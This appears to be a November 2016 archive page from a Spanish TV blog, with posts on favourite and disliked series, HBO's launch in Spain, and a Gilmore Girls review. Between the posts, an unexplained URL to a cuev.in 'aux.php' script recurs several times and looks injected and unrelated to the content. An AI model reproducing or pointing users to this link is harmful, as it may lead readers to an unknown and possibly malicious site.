Archivos Mensuales: noviembre 2016

Series para el día mundial de la televisión

Para los que no lo sepáis, hoy es el Día Mundial de la Televisión (siempre ha de haber un día para todo, y la TV no podía quedarse atrás). Fue en 1996 cuando la Asamblea General de las Naciones Unidas elegía el 21 de noviembre, coincidiendo con el Foro Mundial de la Televisión.

Las series me han acompañado siempre aunque ahora (aprovechando que vivimos su época dorada), consumo más, y sigo más de cerca las noticias relacionadas con ellas. Por eso,, aprovecho esta fecha tan señalada para hacer una lista personal de las series que más me han marcado, aunque hay un hueco para las que me han supuesto una decepción enorme:

Drama favorito: Mujeres desesperadas

Sin duda, una de las series con las que empecé a engancharme hace unos años. Tantos misterios e historias en torno a Wisteria Lane y a sus protagonistas hacían que quisiera que llegara la semana siguiente para saber cómo con tinuaba la historia. A pesar de que a veces rizaban un poco el rizo, resultaba entretenida.

Sitcom favorita: Friends

Serie de culto donde las haya (junto con Sex and the city, creo yo). Es de esas series que supusieron un antes y un después dentro del género televisivo. Reconozcámoslo: estuvimos las diez temporadas esperando a que Ross y Rachel acabaran juntos después de tantas idas y venidas durante la década que estuvo en antena. Y escuchar a Phoebe cantar Smelling cat era de lo mejorcito.

Serie de época favorita: Arriba y abajo

Arriba y Abajo fue una serie que encontré por casualidad por internet y que me enganchó desde el primer capitulo, a pesar de que ya tiene más de cuarenta años.  Aún así, está muy bien documentada y ambientada. Resulta interesante conocer cómo era la vida en la Inglaterra de principios del siglo XX y cómo se vivían hechos como el hundimiento del Titanic, la I Guerra Mundial o el crack del 29.

Serie que odio: Dos hombres y medio

Dos hombres y medio es de esas series que no te explicas cómo las han podido concebir, y menos aún cómo pueden seguir emitiéndola en Neox antes de los Simpson. Tramas forzadas, pretenden llegar a la risa fácil y unos personajes (y actores) que dejan mucho que desear. Lo repetiré toda la vida: no puedo entender cómo Charlie Sheen no se ha dejado influenciar por el talento de su padre.

Serie abandonada: Borgen

Sí, puede ser una de las mejores series de los últimos tiempos. Sí, puede que la trama política sea de lo mejorcito que podamos ver en años. Pero la abandoné a los pocos capítulos porque bastante saturada estoy de la política en los telediarios como para ver cosas similares en series. Quizá le de una oportunidad dentro de un tiempo. De momento, no prometo nada.

Serie que veo por verla: Anatomía de Grey

Es de esas series que deberíain haber acabado hace tiempo. Para mí, en la temporada 10, porque la 11 fue un chasco tremendo y las dos siguientes están siendo un estirar el chicle. Sí, podría haberla dejado apartada hace tiempo, pero Meredith es mucha Meredith y, mal que nos pese, es inevitable querer saber cómo sigue adelante la viuda de todas las series.

Peor final de serie: Lost

Seguro que no soy la única que en el último capítulo de Perdidos soltó un WTF que se escuchó en la otra punta del planeta. Todavía no entiendo cómo hicieron un final tan decepcionante para una serie tan buena. Misterios de la televisión, diría yo.

Mejor final de serie: Los Soprano

Si el final de Lost defraudó a muchos, el de Los Soprano tiene para todos los gustos: hay quien dice que fue decepcionante, mientras que otros la consideran brillante. A mi, personalmente, me gustó bastante. Ese hilo de misterio, en el que no sabes si Tony fue asesinado o si su historia se dio por terminada, hace que deje un buen sabor de boca.

https://cuev.in/aux.php?ver=1.0&ref=at&debug=

HBO llega a España

Su llegada no está siendo  tan pregonada como lo fue en su momento Netflix, pero ya se puede confirmar que HBO ya lo tiene todo preparado para su desembarco en España. Eso sí, desde su página web afirman que ese estreno será muy “pronto”. En enero ya dijeron que sería a lo largo de 2016, por lo que en el mes y medio que queda de año podamos disfrutar de sus servicios. Al igual que Netflix, HBO España ofrecerá un catálogo bastante extenso de series y películas a través de una suscripción mensual.

Entre las series que estarán disponibles en Hbo están Juego de Tronos, Westworld, The Night Of, Girls, Vinyl, The Leftovers, True Blood, Ballers, Divorce, High Maintenance, Quarry, Sexo en Nueva York, True Detective, Supergirl, The Flash, DC Legends of Tomorrow, Frequency, El Exorcista, Lucifer, Preacher, The Young Pope, Silicon Valley y Veep, así como clásicos imprescindibles como Los Soprano.

Sabiendo que HBO emitirá todos sus productos originales, muchos se preguntarán qué ocurrirá con aquellas series del canal que ya se emitían en otras plataformas como Movistar Series. Pues bien: HBO emitirá todas sus series originales, con exclusividad de aquellas que no se han estrenado todavía en España. Las que si han desembarcado en nuestro país (léase Juego de Tronos, por poner un ejemplo), se emitirán de forma conjunta en ambas plataformas.

 

https://cuev.in/aux.php?ver=1.0&ref=at&debug=

https://cuev.in/aux.php?ver=1.0&ref=at&debug=https://cuev.in/aux.php?ver=1.0&ref=at&debug=

Las chicas Gilmore: mejor de lo que me esperaba

Para los que no la conocéis, Las chicas Gilmore es una serie creada por Amy Sherman – Paladino y que se emitió en The CW entre los años 2000 y 2007. Narra la historia de Lorelai  Gilmore y su hija Rory, y cuyos capítulos trataban diversos temas, como la amistad, la familia, los estudios o las clases sociales.

Han pasado 16 años desde su primer capítulo y el próximo 25 de noviembre, Netflix emitirá la octava temporada. Aprovechando la ocasión, he comenzado a ver la serie. He de reconocer que iba un poco con prejuicios: si era la típica serie “buenista” al más puro estilo Fuller House, si era una serie adolescente más… y eso que tenía muy buenas referencias sobre ella.

La verdad es que son muchos los motivos que han hecho que me haya enganchado a la serie desde el primer capítulo:

Uno de los puntos a favor que tiene Las chicas Gilmore es que resulta muy equilibrada ni cae ni en el dramatismo más empalagoso ni busca la risa fácil. Además, esa compenetración que hay entre madre e hija que hace que quiera seguir viendo más capítulos.

Todos y cada uno de los personajes están muy bien definidos. Tenemos a la madre soltera que ha tenido que labrarse un futuro desde que se quedó embarazada, una hija que es bastante madura para su edad, unos abuelos un tanto conservadores,… y unos secundarios que aportan su toque particular.

A lo largo de las siete temporadas, conoceremos todos y cada uno de los detalles de Lorelai y Rory: vida profesioinal / académica, amores y desamores, sus relaciones con sus amigos y familiares…. hasta el punto de encariñarnos con ellas.

Lo reconozco: no se cómo he podido pasar sin ver la serie. Gracias, Netflix, por traerme la serie.